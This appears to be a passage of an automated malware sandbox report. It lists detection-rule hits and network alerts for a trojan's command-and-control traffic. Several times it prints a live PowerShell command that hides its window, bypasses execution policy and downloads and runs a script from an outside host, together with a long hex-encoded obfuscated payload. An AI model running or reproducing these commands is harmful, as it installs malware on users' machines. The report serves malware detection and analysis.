                    Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-21T21:06:21.265075+010020283713Unknown Traffic192.168.11.2049756104.21.96.1443TCP
                    2024-12-21T21:06:23.516539+010020283713Unknown Traffic192.168.11.2049757104.21.96.1443TCP
                    2024-12-21T21:06:32.527624+010020283713Unknown Traffic192.168.11.2049770104.21.96.1443TCP
                    2024-12-21T21:06:33.658430+010020283713Unknown Traffic192.168.11.2049771104.21.96.1443TCP
                    2024-12-21T21:06:34.588053+010020283713Unknown Traffic192.168.11.2049772104.21.96.1443TCP
                    2024-12-21T21:06:35.902005+010020283713Unknown Traffic192.168.11.2049773104.21.96.1443TCP
                    2024-12-21T21:06:37.227791+010020283713Unknown Traffic192.168.11.2049774104.21.96.1443TCP
                    2024-12-21T21:06:38.353632+010020283713Unknown Traffic192.168.11.2049775104.21.96.1443TCP
                    2024-12-21T21:06:42.569447+010020283713Unknown Traffic192.168.11.2049776104.21.96.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-21T21:06:22.231879+010020546531A Network Trojan was detected192.168.11.2049756104.21.96.1443TCP
                    2024-12-21T21:06:24.218240+010020546531A Network Trojan was detected192.168.11.2049757104.21.96.1443TCP
                    2024-12-21T21:06:50.415838+010020546531A Network Trojan was detected192.168.11.2049776104.21.96.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-21T21:06:22.231879+010020498361A Network Trojan was detected192.168.11.2049756104.21.96.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-21T21:06:24.218240+010020498121A Network Trojan was detected192.168.11.2049757104.21.96.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-21T21:06:37.733511+010020480941Malware Command and Control Activity Detected192.168.11.2049774104.21.96.1443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
